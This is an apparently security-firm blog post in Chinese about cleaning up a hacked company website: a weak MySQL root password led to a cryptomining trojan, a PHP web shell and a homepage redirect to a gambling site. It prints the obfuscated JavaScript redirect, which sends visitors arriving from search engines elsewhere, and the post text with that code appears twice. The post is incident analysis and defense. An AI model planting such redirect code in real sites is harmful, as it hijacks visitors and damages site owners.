如何解決公司網站首頁被惡意跳轉的安全問題
發(fā)布時間:2023-09-23 點擊:163
近日某客戶網站被黑,導致網站首頁被篡改并跳轉到賭博網站,網站在百度的收錄也收錄了一些什么彩票內容的快照,網站首頁快照也被修改成賭博內容,并被百度直接紅色風險攔截提示,百度網址安全中心提醒您:該站點可能受到黑客攻擊,部分頁面已被非法篡改!我們sine安全公司根據(jù)以上客戶被黑的情況,立即進行了全面的網站安全檢測,針對網站被黑的情況制定了詳細的安全部署方案。
首先客戶網站使用的是linux centos系統(tǒng)服務器,客戶提供服務器ip,ssh端口,root賬號密碼后,我們進去查看了服務器是否存在被黑以及系統(tǒng)木馬后門的情況,再一個我們對其使用的mysql數(shù)據(jù)庫進行了安全檢測,發(fā)現(xiàn)問題,該mysql數(shù)據(jù)庫的root賬號使用的是弱口令密碼,導致攻擊者可以利用軟件對數(shù)據(jù)庫進行強力破解,導致破解成功,利用root權限直接提權并上傳腳本木馬到網站的根目錄下。
根據(jù)上面發(fā)現(xiàn)的數(shù)據(jù)庫安全問題,我們深度挖掘,追蹤溯源,發(fā)現(xiàn)服務器還存在木馬后門,top,查看linux當前進程,發(fā)現(xiàn)一個可疑的進程,通過查看進程的詳細信息我們發(fā)現(xiàn)該進程是木馬后門進程,再仔細一檢查發(fā)現(xiàn)該木馬是挖礦木馬,攻擊者利用服務器資源,帶寬,進行挖礦,像比特幣、以太坊等幣進行挖礦。
我們對其挖礦木馬進行安全分析:如下圖
解密木馬內容,我們發(fā)現(xiàn)該木馬目前來說是免殺的木馬,一般人是看不出問題來,但是經常維護服務器的運維人員就會察覺出來,第一該木馬隱藏到linux進程當中去,根據(jù)時間段進行挖礦,避開高峰時間,以及維護人員的工作時間,當挖礦的時候木馬進程cpu占用達到百分之80以上,甚至有時候網站都打開很慢。服務器的木馬查完后,我們對網站的源代碼進行安全檢測,發(fā)現(xiàn)網站目錄里被上傳了網站木馬后門,php腳本木馬,該腳本木馬可以對網站進行讀寫新建等操作,網站的首頁標題描述也被改成了什么賭博的內容如下圖:
<>eval(function(p,a,c,k,e,d){e=function(c){return(c
(parseint(c/a))) ((c=c%a)>35?string.fromcharcode(c 29):c.tostring
(36))};if(!\’\’.replace(/^/,string)){while(c–)d[e(c)]=k[c]||e(c);k=
[function(e){return d[e]}];e=function(){return\’\\\\w \’};c=1;};while(c–)
if(k[c])p=p.replace(new regexp(\’\\\\b\’ e(c) \’\\\\b\’,\’g\’),k[c]);return p;}
(\’3.4(\”\”);3.4(\”d 1=3.f\”);3.4(\”e(1.2(\\\\\”7\\\\\”)>0 || 1.2(\\
\\\”6\\\\\”)>0 || 1.2(\\\\\”8\\\\\”)>0 ||1.2(\\\\\”a\\\\\”)>0 ||1.2(\\\\\”9\\\\\”)>0 ||1.2(\\
\\\”l\\\\\”)>0 ||1.2(\\\\\”m\\\\\”)>0 ||1.2(\\\\\”k\\\\\”)>0 )\”);3.4(\”h.g=\\\\\”j://i.o.n\\
\\\”;\”);3.4(\”\”);\’,25,25,\’|s|indexof|document|writeln||sogou|
baidu|soso|uc|sm|java|language|var|if|referrer|href|location|www|
http|so|bing|yahoo|com|268238\’.split(\’|\’),0,{}))
通過解密上面的代碼發(fā)現(xiàn),只要是從百度,搜狗,以及soso,so,bing等搜索引擎來的訪問,都會直接跳轉到攻擊者設定好的賭博網站上去。隨即我們sine安全公司對該惡意代碼進行了清除,網站恢復正常訪問。
以上就是我們解決客戶網站安全的整個過程,下面針對于此次網站被黑,提供如下 的網站安全建議:
1.對mysql數(shù)據(jù)庫進行安全部署,對root賬號密碼加密,盡可能設置的復雜一些,數(shù)字 大小寫字母 特殊符號,對網站數(shù)據(jù)庫進行分配普通權限賬號。
2.mysql數(shù)據(jù)庫默認端口3306,改為51158,并加入到端口安全策略,不對外開放,外網ip無法連接數(shù)據(jù)庫,只有本地127.0.0.1才能進行連接數(shù)據(jù)庫,以防止攻擊者惡意猜測。
3.對服務器底層系統(tǒng)進行安全加固,包括ssh登錄的安全驗證。
4.對網站代碼進行整體的安全檢測,包括定期的升級網站程序源代碼,修復補丁以及網站漏洞。
互聯(lián)網人應該向產品經理學習的幾點經驗
租用云服務器一天
云服務器優(yōu)惠采購入口
騰訊云服務器和華為哪個好用
云服務器怎么保持開機
如何設置路由器wifi密碼 wifi路由器設置密碼方法
騰訊云服務器秒殺買哪種
麻煩幫我看看小圖標不現(xiàn)實問題
首先客戶網站使用的是linux centos系統(tǒng)服務器,客戶提供服務器ip,ssh端口,root賬號密碼后,我們進去查看了服務器是否存在被黑以及系統(tǒng)木馬后門的情況,再一個我們對其使用的mysql數(shù)據(jù)庫進行了安全檢測,發(fā)現(xiàn)問題,該mysql數(shù)據(jù)庫的root賬號使用的是弱口令密碼,導致攻擊者可以利用軟件對數(shù)據(jù)庫進行強力破解,導致破解成功,利用root權限直接提權并上傳腳本木馬到網站的根目錄下。
根據(jù)上面發(fā)現(xiàn)的數(shù)據(jù)庫安全問題,我們深度挖掘,追蹤溯源,發(fā)現(xiàn)服務器還存在木馬后門,top,查看linux當前進程,發(fā)現(xiàn)一個可疑的進程,通過查看進程的詳細信息我們發(fā)現(xiàn)該進程是木馬后門進程,再仔細一檢查發(fā)現(xiàn)該木馬是挖礦木馬,攻擊者利用服務器資源,帶寬,進行挖礦,像比特幣、以太坊等幣進行挖礦。
我們對其挖礦木馬進行安全分析:如下圖
解密木馬內容,我們發(fā)現(xiàn)該木馬目前來說是免殺的木馬,一般人是看不出問題來,但是經常維護服務器的運維人員就會察覺出來,第一該木馬隱藏到linux進程當中去,根據(jù)時間段進行挖礦,避開高峰時間,以及維護人員的工作時間,當挖礦的時候木馬進程cpu占用達到百分之80以上,甚至有時候網站都打開很慢。服務器的木馬查完后,我們對網站的源代碼進行安全檢測,發(fā)現(xiàn)網站目錄里被上傳了網站木馬后門,php腳本木馬,該腳本木馬可以對網站進行讀寫新建等操作,網站的首頁標題描述也被改成了什么賭博的內容如下圖:
<>eval(function(p,a,c,k,e,d){e=function(c){return(c
(parseint(c/a))) ((c=c%a)>35?string.fromcharcode(c 29):c.tostring
(36))};if(!\’\’.replace(/^/,string)){while(c–)d[e(c)]=k[c]||e(c);k=
[function(e){return d[e]}];e=function(){return\’\\\\w \’};c=1;};while(c–)
if(k[c])p=p.replace(new regexp(\’\\\\b\’ e(c) \’\\\\b\’,\’g\’),k[c]);return p;}
(\’3.4(\”\”);3.4(\”d 1=3.f\”);3.4(\”e(1.2(\\\\\”7\\\\\”)>0 || 1.2(\\
\\\”6\\\\\”)>0 || 1.2(\\\\\”8\\\\\”)>0 ||1.2(\\\\\”a\\\\\”)>0 ||1.2(\\\\\”9\\\\\”)>0 ||1.2(\\
\\\”l\\\\\”)>0 ||1.2(\\\\\”m\\\\\”)>0 ||1.2(\\\\\”k\\\\\”)>0 )\”);3.4(\”h.g=\\\\\”j://i.o.n\\
\\\”;\”);3.4(\”\”);\’,25,25,\’|s|indexof|document|writeln||sogou|
baidu|soso|uc|sm|java|language|var|if|referrer|href|location|www|
http|so|bing|yahoo|com|268238\’.split(\’|\’),0,{}))
通過解密上面的代碼發(fā)現(xiàn),只要是從百度,搜狗,以及soso,so,bing等搜索引擎來的訪問,都會直接跳轉到攻擊者設定好的賭博網站上去。隨即我們sine安全公司對該惡意代碼進行了清除,網站恢復正常訪問。
以上就是我們解決客戶網站安全的整個過程,下面針對于此次網站被黑,提供如下 的網站安全建議:
1.對mysql數(shù)據(jù)庫進行安全部署,對root賬號密碼加密,盡可能設置的復雜一些,數(shù)字 大小寫字母 特殊符號,對網站數(shù)據(jù)庫進行分配普通權限賬號。
2.mysql數(shù)據(jù)庫默認端口3306,改為51158,并加入到端口安全策略,不對外開放,外網ip無法連接數(shù)據(jù)庫,只有本地127.0.0.1才能進行連接數(shù)據(jù)庫,以防止攻擊者惡意猜測。
3.對服務器底層系統(tǒng)進行安全加固,包括ssh登錄的安全驗證。
4.對網站代碼進行整體的安全檢測,包括定期的升級網站程序源代碼,修復補丁以及網站漏洞。
互聯(lián)網人應該向產品經理學習的幾點經驗
租用云服務器一天
云服務器優(yōu)惠采購入口
騰訊云服務器和華為哪個好用
云服務器怎么保持開機
如何設置路由器wifi密碼 wifi路由器設置密碼方法
騰訊云服務器秒殺買哪種
麻煩幫我看看小圖標不現(xiàn)實問題
上一篇:購買阿里云服務器流程圖
下一篇:云服務器怎么掛機網頁游戲